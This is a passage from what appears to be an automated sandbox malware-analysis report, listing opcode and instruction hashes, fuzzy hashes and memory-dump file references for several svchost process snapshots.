                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b1e91d4bfb01b64c40339d734ca5ab26c179b191b9da14f3cf18d8baddc51d21
                                                              • Instruction ID: 9644c35817e7d7cd151c8d6d93e4b5499eb4f6ea70f682293e05d8ea0ead9a6c
                                                              • Opcode Fuzzy Hash: b1e91d4bfb01b64c40339d734ca5ab26c179b191b9da14f3cf18d8baddc51d21
                                                              • Instruction Fuzzy Hash: CB014710A0C7864FE752A72C08A94367FE0EF9A310B0804FAE888C61A7DC4CA94593D3
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2784962093.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_7ffd348b0000_svchost.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: adf6c3c0efda88e7ef8ff86b57ce5f30473d3d5d14ae07cfb0977f06cb8dcbc2
                                                              • Instruction ID: 9e8a68a4ea9f7b61a7316f7c3818c2fba9cede0aa1299f3db549ba3dc37e0b73
                                                              • Opcode Fuzzy Hash: adf6c3c0efda88e7ef8ff86b57ce5f30473d3d5d14ae07cfb0977f06cb8dcbc2
                                                              • Instruction Fuzzy Hash: B542B531B1CA494FE7A8EB6C84B6679B7D2FF99340F540579E44EC32D2DE78A8019381
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2784962093.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_7ffd348b0000_svchost.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c2985ec336cda90f633d6e3b0bacbce7f271b4f743dca78a4e6b328c2cf52f36
                                                              • Instruction ID: b437cf079717fe298e4c66a1dc0881b7e32053c49bbf74871ca49afece0b08e4
                                                              • Opcode Fuzzy Hash: c2985ec336cda90f633d6e3b0bacbce7f271b4f743dca78a4e6b328c2cf52f36
                                                              • Instruction Fuzzy Hash: DE51F210B1E6C54FE796A7B84878276BFD5DF87215B0805FBE0C9C7293DD586806C382
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2784962093.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_7ffd348b0000_svchost.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 1M_^
                                                              • API String ID: 0-2690736931
                                                              • Opcode ID: dd8de33c98797cbd4c9f7d849df5a6a2e138f7c32fb777bbc0e1490d4ea9273d
                                                              • Instruction ID: 40d47fa3047b6ced2eb65fe350dde8638a019fef0a84189013e097ba9d9323e1
                                                              • Opcode Fuzzy Hash: dd8de33c98797cbd4c9f7d849df5a6a2e138f7c32fb777bbc0e1490d4ea9273d
                                                              • Instruction Fuzzy Hash: 9531D832E0D7864FE751ABBC98B50EA7BB0EF47354B0802B7C189CB193ED6C64058781
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2784962093.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_7ffd348b0000_svchost.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e9c5d3fb274dd4ba55b8a7c18a8caa52e5368a521adb665d7a512e90436a3f5a
                                                              • Instruction ID: f895ae0e1a99c4a6e82ee4a0fa0c13ec479f85fdb3c0447015b0e49f9c57cfd6
                                                              • Opcode Fuzzy Hash: e9c5d3fb274dd4ba55b8a7c18a8caa52e5368a521adb665d7a512e90436a3f5a
                                                              • Instruction Fuzzy Hash: BE511621B0DA8A0FE366A7BC58661B63BD5DF8732070941FBD089C71A3DC5C6C428391
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2784962093.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_7ffd348b0000_svchost.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5d040c2b44a623c55d2b20ed5c38dcc8954ee4493ebd061125c2d9dc3d661c65
                                                              • Instruction ID: 770b2a45ac519636d08d91f02d4e09d34d113e86a73fe492c4b6bd426b0fc1ee
                                                              • Opcode Fuzzy Hash: 5d040c2b44a623c55d2b20ed5c38dcc8954ee4493ebd061125c2d9dc3d661c65
                                                              • Instruction Fuzzy Hash: 7841D536B09A1D9FDB54EBACD8B26ED77A1FF85311F54017AD008D3282DE39A4468780
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2784962093.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_7ffd348b0000_svchost.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 050a15ef2a450c5630bd1eaf6668377e01667c676c2ce4200edbbcb101ac56a0
                                                              • Instruction ID: a52865d097cfbce8de11138bb6ffdb4e0bc04e4eb2af5bbdf5f4ad833497844e
                                                              • Opcode Fuzzy Hash: 050a15ef2a450c5630bd1eaf6668377e01667c676c2ce4200edbbcb101ac56a0
                                                              • Instruction Fuzzy Hash: E451C036B0E6595FD311EBFCA4B11EA7B74EF81315B8845BAD088CB283DE786545C780
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2784962093.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_7ffd348b0000_svchost.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a76cc765a223adeb00b5e82399893d4d9a5d3fff4f76cc16e7009b3c5527175c
                                                              • Instruction ID: dd8b2b9fd0b06cdda8a1aad0c4210f8337e088951efadf2db6c8a915421cb3ea
                                                              • Opcode Fuzzy Hash: a76cc765a223adeb00b5e82399893d4d9a5d3fff4f76cc16e7009b3c5527175c
                                                              • Instruction Fuzzy Hash: AB31CB21B1D9494FEB98EB6C9469379B7C6EF99315F0405BEE44DC32D3DD68AC418380
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2784962093.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_7ffd348b0000_svchost.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f1648fd9e2c17b644b797a4352dbd52ec475f419235c3c44da44f88159dc2b19
                                                              • Instruction ID: 711fd698196f62e6c61bd9bfc3d7f199f8d6a1bebc01f82e4a434cc779fae4a9
                                                              • Opcode Fuzzy Hash: f1648fd9e2c17b644b797a4352dbd52ec475f419235c3c44da44f88159dc2b19
                                                              • Instruction Fuzzy Hash: 1331B221B1CA090FEB95BBEC58693BD77D2EF99311F1802BAE00DC32D2DD6868018391
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2784962093.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_7ffd348b0000_svchost.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ef9a6ce1b39ce4ce5251ba802a5005a626ddf31835cd924c4c5b2165c308fa95
                                                              • Instruction ID: 274ba66aebb9b4533cfb7416f905d2a6fc3dd689b52fc2e617a0da12306c050a
                                                              • Opcode Fuzzy Hash: ef9a6ce1b39ce4ce5251ba802a5005a626ddf31835cd924c4c5b2165c308fa95
                                                              • Instruction Fuzzy Hash: B2014711E0C7860FE752A72C58A94357FE0EF9A350B0804BAE888C71A7DD4CB94193D3
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2866007249.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_7ffd348c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 74a18fe33c9bf7b6135421c3b6a3dc3b4bc17e298d87d34685fe61670954d426
                                                              • Instruction ID: 8826cb502c4e0054916450ee8ad2cc4c87a196bd5dac14006f60e1569f4b8591
                                                              • Opcode Fuzzy Hash: 74a18fe33c9bf7b6135421c3b6a3dc3b4bc17e298d87d34685fe61670954d426
                                                              • Instruction Fuzzy Hash: 8D52C820B18A4A4FE7A4EBAC84B5679B7D2FF99310F54457AE44EC32D2DE38AC019741
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2866007249.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_7ffd348c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c1681769bd6f49209e4e7719029f818a3d9cff0cd2cef7da8a641ffca20dd01c
                                                              • Instruction ID: 2fc6c26a256757e44941217d76b6b4fee12b8a0ae630c4534f803688eb6e600d
                                                              • Opcode Fuzzy Hash: c1681769bd6f49209e4e7719029f818a3d9cff0cd2cef7da8a641ffca20dd01c
                                                              • Instruction Fuzzy Hash: FF51CB10B1E6C54FE796A7B848B42A6BFE5DF87219B0804FBE089C71E3DD586806C342
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2866007249.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_7ffd348c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 1L_^
                                                              • API String ID: 0-2711816468
                                                              • Opcode ID: d7121779fdf02048d3d0460be98b26e6de9dc25cbed45dcaa4a0342263a79bbb
                                                              • Instruction ID: 355290d3902eaaf43685a9938c90d1a82abaa20e2cab69eec74fbef90fa385af
                                                              • Opcode Fuzzy Hash: d7121779fdf02048d3d0460be98b26e6de9dc25cbed45dcaa4a0342263a79bbb
                                                              • Instruction Fuzzy Hash: AA31A426A0D7860FE752ABBC59F60E9BBB0EF43314B0841B7C189DB1A3DD3C68069741
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2866007249.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_7ffd348c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b6ee16da4aa690055ad9cfed42a0eb382f87e74364a70c555ab6213fec0f2c95
                                                              • Instruction ID: 425f4de79ac6430a124adb00af0aa1c23818dd0cee1bb613ed0396be8e6299f8
                                                              • Opcode Fuzzy Hash: b6ee16da4aa690055ad9cfed42a0eb382f87e74364a70c555ab6213fec0f2c95
                                                              • Instruction Fuzzy Hash: AB510521B0D6860FE366A7BC58661BA7BD6DF87361B0940FBD089C71A3DC1C9C428352
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2866007249.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_7ffd348c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 37ce09293412b026bb15004322089221263084cac3bb17455c9ef8d1620a08a9
                                                              • Instruction ID: d6e16236faa6d834e5c30737e8fb778569fddabd33f284760a321e9e5e6f12b7
                                                              • Opcode Fuzzy Hash: 37ce09293412b026bb15004322089221263084cac3bb17455c9ef8d1620a08a9
                                                              • Instruction Fuzzy Hash: C851F626B0D6464FD311EBFCA4B11EA7B74EF4231474844BBD188DB293EE38A805C785
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2866007249.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_7ffd348c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 076c0143accc8d31140787c96634d53f88713956462fa13dfc0905074f527d19
                                                              • Instruction ID: 617c4d24d7f5c7df3c94935472c9fc62f86bcb22fa683976b3a25540ddba489e
                                                              • Opcode Fuzzy Hash: 076c0143accc8d31140787c96634d53f88713956462fa13dfc0905074f527d19
                                                              • Instruction Fuzzy Hash: 2341E535B04A1A9FDB40EBECD8B16EA77A1FF85301F54013AD108E3292DE39A446C780
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2866007249.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_7ffd348c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5913fc9a402e5231f128068267169e8315afcb2c0431c57bfc33c697591841e1
                                                              • Instruction ID: 9b971f22639f2201bc05a2fb1ff2e64ad823909ce51686d36c0183c58b52612a
                                                              • Opcode Fuzzy Hash: 5913fc9a402e5231f128068267169e8315afcb2c0431c57bfc33c697591841e1
                                                              • Instruction Fuzzy Hash: B631E921B1C9490FEB98E76C946A379B7C6EF99315F0405BEE00EC32E3DD68AC418341
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2866007249.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_7ffd348c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5f11105dc40ddab97c3dca42564ec36fb9286b6494dc69b2203f4b34a950dfb0
                                                              • Instruction ID: 33e2950b0e0cec94f7e3761af07a48b965b163c2d658ea427e0fb48b391b41f4
                                                              • Opcode Fuzzy Hash: 5f11105dc40ddab97c3dca42564ec36fb9286b6494dc69b2203f4b34a950dfb0
                                                              • Instruction Fuzzy Hash: A031A621B18A091FEB95BBEC58693FEB6D6EB99351F14427BE00DC32D2DD286C418391
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2866007249.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_7ffd348c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 05bb2e3a0974891f9fec9d742ead07435f26f7c7508aba1d347c63c3df3a0a81
                                                              • Instruction ID: 0fa0909d9c880538cc39751f6599083a3a5c5cec2f0d49f862a9e064759596c6
                                                              • Opcode Fuzzy Hash: 05bb2e3a0974891f9fec9d742ead07435f26f7c7508aba1d347c63c3df3a0a81
                                                              • Instruction Fuzzy Hash: A001DF15E0CA860FE792A73C58A5576AFE0EF96350B0804ABE988C61F7D91CAD4193D3
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.3369495413.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_7ffd348b0000_svchost.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 483ec0d4190e74169d3a995f2d14d1cb877bfd6b652b6351f158e90888741f50
                                                              • Instruction ID: dfba5dc1b01c90c10c387625cb994fa79e354574b4de8dd2ad6339d38de016e9
                                                              • Opcode Fuzzy Hash: 483ec0d4190e74169d3a995f2d14d1cb877bfd6b652b6351f158e90888741f50
                                                              • Instruction Fuzzy Hash: 3852A521B1CA494FE7A8EB6C84B96797BD2FF99300F54057DE54EC72D2DE38A8019381
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.3369495413.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_7ffd348b0000_svchost.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 1M_^
                                                              • API String ID: 0-2690736931
                                                              • Opcode ID: 54f57e7947134b7a278a61f530f27b5ab87d1cf46fb61d36d1799b9d4d868fba
                                                              • Instruction ID: 1356271ee5bd7e904a12e95816d791685bc525cc064f41cc8dd5c8aa2a795b8c
                                                              • Opcode Fuzzy Hash: 54f57e7947134b7a278a61f530f27b5ab87d1cf46fb61d36d1799b9d4d868fba
                                                              • Instruction Fuzzy Hash: C531A722E0D7864FE751ABBC58B50EA7BB0EF47354B0842B7D189CB193ED6C64059781
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.3369495413.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_7ffd348b0000_svchost.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 38f8d81efb67b70b2a375a2c20881d0e4f7ff55fdbfd4acaafcf0245091c6a84
                                                              • Instruction ID: 7136ec6fe61d90a27989bc517cae69773be911955bc4810cb2c7057115e7833c
                                                              • Opcode Fuzzy Hash: 38f8d81efb67b70b2a375a2c20881d0e4f7ff55fdbfd4acaafcf0245091c6a84
                                                              • Instruction Fuzzy Hash: 7B510521B0DA8A0FE366A7BC58761B63BE5DF87221B0941FBD489C71A3DD5C6C428391
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.3369495413.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_7ffd348b0000_svchost.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6ba349b3fbf13f853549edfd32a078d8c854774ae566a8f7aea29482eb3cf94d
                                                              • Instruction ID: 0e7730f1d5d2b12b41a3c27cc88782c8201e3a12ded6bba91c6ed73f578beecb
                                                              • Opcode Fuzzy Hash: 6ba349b3fbf13f853549edfd32a078d8c854774ae566a8f7aea29482eb3cf94d
                                                              • Instruction Fuzzy Hash: 6341D435B18A1D8FEB50EBACD8B16ED77E1FF85311F54017AD108D7282CE39A4068780
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.3369495413.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_7ffd348b0000_svchost.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 86d66a861d18499d3c8a30e7f6fe9af7062160d636314c2d9d2468d51cb34c69
                                                              • Instruction ID: d1dab3e2bb61a39521170f002d1c6f70f6768c6876015580e9484fca5e1e8cd7
                                                              • Opcode Fuzzy Hash: 86d66a861d18499d3c8a30e7f6fe9af7062160d636314c2d9d2468d51cb34c69
                                                              • Instruction Fuzzy Hash: AB51D336B0D6994FD391EBFCA4B11E93F74EF81315B4845BAD188CB283DE3864458784
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.3369495413.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_7ffd348b0000_svchost.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f1648fd9e2c17b644b797a4352dbd52ec475f419235c3c44da44f88159dc2b19
                                                              • Instruction ID: 711fd698196f62e6c61bd9bfc3d7f199f8d6a1bebc01f82e4a434cc779fae4a9
                                                              • Opcode Fuzzy Hash: f1648fd9e2c17b644b797a4352dbd52ec475f419235c3c44da44f88159dc2b19
                                                              • Instruction Fuzzy Hash: 1331B221B1CA090FEB95BBEC58693BD77D2EF99311F1802BAE00DC32D2DD6868018391